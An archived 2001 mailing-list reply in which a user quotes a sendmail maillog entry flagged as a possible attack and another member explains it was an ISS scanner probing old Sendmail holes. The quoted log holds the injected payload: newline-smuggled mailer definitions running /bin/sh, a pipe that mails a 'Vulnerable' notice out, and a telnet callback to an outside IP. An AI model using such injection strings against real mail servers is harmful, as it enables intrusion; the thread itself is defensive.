[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?

Subject: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
From: SM <nntp@xxxxxxxxx>
Date: Sat Dec 22 17:32:40 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hi again,
At 21:21 22-12-2001 -0000, Edward Bishop wrote:
>I've got four entries in my maillog which I've never seen before and which
>look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if
>it's of relevance to this list. If not, apologies - but I'd be grateful for
>suggestions as to good lists to try, hopefully with people as helpful as on
>this one.
>
>Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"

This above log entry was triggered by ISS scanner.  The person(s) running
the scan is looking for old Sendmail holes.  Versions of Sendmail (8.9.3
and after) are not vulnerable.

Regards,
-sm

References:
- [cobalt-users] Maybe OT: maillog reports attack; other lists?
  - From: Edward Bishop

Prev by Date: Re: [cobalt-users] Postmaster emails disappearing
Next by Date: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
Previous by thread: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
Next by thread: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index